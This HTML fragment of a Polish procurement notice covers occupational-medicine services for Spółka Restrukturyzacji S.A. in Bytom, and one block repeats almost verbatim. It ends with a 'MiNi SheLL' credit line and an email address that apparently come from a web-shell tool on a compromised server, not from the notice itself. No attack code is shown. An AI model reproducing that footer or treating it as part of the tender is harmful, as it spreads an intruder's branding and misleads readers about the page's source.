2.	Badania wstępne, okresowe, kontrolne i końcowe będą w swym zakresie
obejmowały:
- badania lekarzy profilaktyków,
- badania laboratoryjne tj. OB., morfologia, mocz, cholesterol,
- badania lekarzy specjalistów w zakresie badań okulistycznych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.10.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Część VII: Świadczenie usług medycyny pracy w zakresie badań wstępnych, okresowych, kontrolnych oraz profilaktycznej opieki zdrowotnej dla pracowników Spółki Restrukturyzacji S.A. w Bytomiu..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres usługi:
1.Badania będą przeprowadzane dla: pracowników  administracyjno - biurowych - badania okresowe, dla ok. 130 pracowników, pracowników po nieobecności w pracy powyżej 30 dni - badanie kontrolne, pracowników nowoprzyjętych - badanie wstępne.
2. Badania wstępne, okresowe, kontrolne będą w swym zakresie obejmowały:
- badania lekarzy profilaktyków,
- badania laboratoryjne tj. OB., morfologia, mocz, cholesterol,
- badania lekarzy specjalistów w zakresie badań okulistycznych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.10.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com